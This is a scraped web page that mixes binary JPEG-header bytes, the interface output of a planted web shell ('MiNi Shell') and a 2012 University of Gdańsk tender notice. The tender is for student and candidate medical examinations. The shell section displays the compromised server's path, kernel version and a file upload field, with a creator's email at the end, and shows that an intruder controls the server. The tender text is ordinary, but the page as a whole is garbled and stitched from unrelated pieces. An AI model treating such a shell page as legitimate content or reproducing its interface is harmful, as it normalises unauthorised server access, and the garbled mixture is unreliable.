JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/112594-N-2012.html

<p class="kh_header"><b>Gdańsk: Świadczenie usług medycznych dla Uniwersytetu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 112594 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych dla Uniwersytetu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec studentów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną.
II część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec doktorantów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną.
III część - Badanie lekarskie profilaktyczne kandydatów przyjętych na studia.
Zakres przedmiotu zamówienia: 
CZĘŚĆ I:  przebadanie ok. 300 studentów;
CZEŚĆ II: przebadanie ok. 365 doktorantów;
CZĘŚĆ III: przebadania ok. 1000 kandydatów na studia.
Uzgodniona wielkość zamówienia jest wielkością szacunkową i uzależniona ona będzie od faktycznych potrzeb Zamawiającego. Ewentualne zmniejszenie ilości, nie spowoduje zmiany ceny jednostkowej, jak również z tego powodu nie będą przysługiwały Wykonawcy żadne dodatkowe roszczenia w stosunku 
do Zamawiającego. 
Zamawiający wymaga, aby:
1)	Wykonawca realizujący przedmiot zamówienia dysponował placówką na terenie miasta Gdańsk,
2)	placówka Wykonawcy znajdowała się w bliskiej odległości od środków komunikacji publicznej
 tj.  linii SKM , linii tramwajowej lub autobusowej,
3)	konsultacje i badania odbywały się od poniedziałku do piątku w godzinach od 7.00 do 18:00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Część III - badanie lekarskie profilaktyczne kandydatów przyjętych na studia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o podwykonawcach,  jeżeli  Wykonawca  zamierza powierzyć podwykonawcom określony zakres zamówienia, musi  wykazać to w niniejszym załączniku. Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi nie dołącza do oferty załącznika.- załącznik nr 8 (do SIWZ ). 
Oświadczenie składa jeden  z Wykonawców ubiegających się wspólnie  o udzielenie zamówienia 
 (w imieniu członków konsorcjum oświadczenie o podwykonawcach  może złożyć pełnomocnik - 
z treści tego oświadczenia musi wyraźnie wynikać, że pełnomocnik składa je w imieniu  członka konsorcjum).
zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 6a, 6b i 6c  (do SIWZ)-odpowiednio dla części ; Wykonawca może też zastosować się do informacji   zawartej w rozdziale XVI pkt. 1).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana  postanowień niniejszej umowy dopuszczalna jest w następujących przypadkach:
1)	zmiany obowiązujących przepisów prawa,
2)	zaistnienia siły wyższej,
3)	zmiana terminu realizacji umowy ze względu na wystąpienie okoliczności z przyczyn           (ekonomicznych, technicznych i organizacyjnych) leżących po stronie Zamawiającego lub gdy zmiany są korzystne dla Zamawiajacego, 
4)	 nie wyczerpania ilości asortymentu badań i wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.univ.gda.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 10:00, miejsce: Uniwersytet Gdański
Dział Zamówień Publicznych
pokój 124
ul.Bażyńskiego 1a
80-952 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający dopuszcza możliwość składania ofert częściowych, według części I, II i III.
2.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. W przypadku, gdy oferta zawierać będzie propozycje rozwiązań alternatywnych lub wariantowych - oferta zostanie odrzucona.
3.	Zamawiający nie zamierza zawrzeć umowy ramowej jak i ustanowienia dynamicznego systemu zakupów.
4.	Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
5.	Zamawiający nie dopuszcza możliwości składania ofert równoważnych.
6.	Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają wyłącznie Wykonawcę.
7.	Rozliczenia dokonywane będą tylko w złotych polskich.
8.	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.
9.	SIWZ udostępnia się na stronie internetowej Zamawiającego www.univ.gda.pl od dnia zamieszczenia publikacji w Biuletynie Zamówień Publicznych do upływu terminu składania ofert.
10.	SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy za stronę + koszty przesyłki -listem poleconym za zwrotnym potwierdzeniem odbioru) - art. 42 ust 2 ustawy. 
11.	Zamawiający zleci skopiowanie dokumentacji przetargowej.
12.	Zamawiający w szczególnie uzasadnionych przypadkach może w każdym czasie, przed upływem terminu 
do składania ofert, zmienić treść SIWZ. Dokonaną zmianę Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym  przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
13.	Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu, 
 Zamawiający zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień Publicznych.
14.	Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia o zamówieniu niezbędny będzie dodatkowy czas na wprowadzenie zmian w ofertach, Zamawiający przedłuży termin składania ofert. 
O przedłużeniu terminu składania ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej Zamawiającego - art. 38 ust. 6 ustawy.
15.	Zgodnie z zapisem art. 8 ustawy oraz regulacją ustawy o dostępie do informacji publicznej postępowanie 
o udzielenie zamówienia publicznego jest jawne. Zamawiający może ograniczyć dostęp do informacji związanych  z postępowaniem tylko w przypadkach określonych w ustawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec studentów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec studentów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną.
Zakres przedmiotu zamówienia: 
CZĘŚĆ I:  przebadanie ok. 300 studentów;
Uzgodniona wielkość zamówienia jest wielkością szacunkową i uzależniona ona będzie od faktycznych potrzeb Zamawiającego. Ewentualne zmniejszenie ilości, nie spowoduje zmiany ceny jednostkowej, jak również z tego powodu nie będą przysługiwały Wykonawcy żadne dodatkowe roszczenia w stosunku 
do Zamawiającego. 
Zamawiający wymaga, aby:
1)	Wykonawca realizujący przedmiot zamówienia dysponował placówką na terenie miasta Gdańsk,
2)	placówka Wykonawcy znajdowała się w bliskiej odległości od środków komunikacji publicznej
 tj.  linii SKM , linii tramwajowej lub autobusowej,
3)	konsultacje i badania odbywały się od poniedziałku do piątku w godzinach od 7.00 do 18:00.
Termin wykonania zamówienia:  30 maja 2012 r.  -  29 maja 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec doktorantów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część - Wykonywanie profilaktycznych badań lekarskich mających na celu ocenę możliwości podjęcia i kontynuowania kształcenia ze względu na stan zdrowia wobec doktorantów, którzy w trakcie studiów są lub będą narażeni na działanie czynników szkodliwych określonych przez placówkę dydaktyczną.
CZEŚĆ II: przebadanie ok. 365 doktorantów;
5.	Uzgodniona wielkość zamówienia jest wielkością szacunkową i uzależniona ona będzie od faktycznych potrzeb Zamawiającego. Ewentualne zmniejszenie ilości, nie spowoduje zmiany ceny jednostkowej, jak również z tego powodu nie będą przysługiwały Wykonawcy żadne dodatkowe roszczenia w stosunku 
do Zamawiającego. 
Zamawiający wymaga, aby:
1)	Wykonawca realizujący przedmiot zamówienia dysponował placówką na terenie miasta Gdańsk,
2)	placówka Wykonawcy znajdowała się w bliskiej odległości od środków komunikacji publicznej
 tj.  linii SKM , linii tramwajowej lub autobusowej,
3)	konsultacje i badania odbywały się od poniedziałku do piątku w godzinach od 7.00 do 18:00.
Termin wykonania zamówienia - 30 maja 2012 r. -  29 maja 2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - badanie lekarskie profilaktyczne kandydatów przyjętych na studia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - badanie lekarskie profilaktyczne kandydatów przyjętych na studia.
CZĘŚĆ III: przebadania ok. 1000 kandydatów na studia.
Uzgodniona wielkość zamówienia jest wielkością szacunkową i uzależniona ona będzie od faktycznych potrzeb Zamawiającego. Ewentualne zmniejszenie ilości, nie spowoduje zmiany ceny jednostkowej, jak również z tego powodu nie będą przysługiwały Wykonawcy żadne dodatkowe roszczenia w stosunku 
do Zamawiającego. 
Zamawiający wymaga, aby:
1)	Wykonawca realizujący przedmiot zamówienia dysponował placówką na terenie miasta Gdańsk,
2)	placówka Wykonawcy znajdowała się w bliskiej odległości od środków komunikacji publicznej
 tj.  linii SKM , linii tramwajowej lub autobusowej,
3)	konsultacje i badania odbywały się od poniedziałku do piątku w godzinach od 7.00 do 18:00.
Termin wykonaniqa zamówienia -1 sierpnia 2012 r. - 10 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com